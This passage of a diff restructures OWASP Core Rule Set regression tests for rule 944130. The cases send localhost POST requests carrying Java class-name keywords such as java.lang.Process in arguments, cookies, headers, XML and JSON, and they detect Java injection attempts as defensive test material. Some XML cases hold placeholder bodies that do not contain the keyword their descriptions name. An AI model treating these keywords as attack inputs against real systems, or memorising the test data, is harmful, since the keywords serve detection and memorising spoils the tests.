\"944130\"" - - test_title: 944130-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 290 desc: "Cookie name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Number=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 291 desc: "Request header test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 292 desc: "XML attribute value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-293 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 293 desc: "XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_id: 294 desc: "Nested XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_id: 295 desc: "Content-Type text/plain includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_id: 296 desc: "Content-Type application/json arg value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Number\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log_contains: "id \"944130\"" + - test_id: 297 desc: 
"Content-Type application/json arg name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Number\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 298 desc: "Argument test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_id: 299 desc: "Argument name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log_contains: "id \"944130\"" + - test_id: 300 desc: "Cookie test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Object - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 301 desc: "Cookie name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Object=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 302 desc: "Request header test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Object - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 303 desc: "XML attribute value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 304 desc: "XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_id: 305 desc: "Nested XML element value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_id: 306 desc: "Content-Type text/plain includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_id: 307 desc: "Content-Type application/json arg value includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Object\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log_contains: "id \"944130\"" + - test_id: 308 desc: "Content-Type application/json arg name includes keyword java.lang.Object" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Object\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 309 desc: "Argument test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_id: 310 desc: "Argument name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log_contains: "id \"944130\"" + - test_id: 311 desc: "Cookie test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 312 desc: "Cookie name includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Process=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 313 desc: "Request header test includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Process - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-314 
+ - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 314 desc: "XML attribute value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 315 desc: "XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_id: 316 desc: "Nested XML element value includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Process" - output: - log_contains: "id \"944130\"" - - test_title: 944130-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_id: 317 desc: "Content-Type text/plain includes keyword java.lang.Process" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
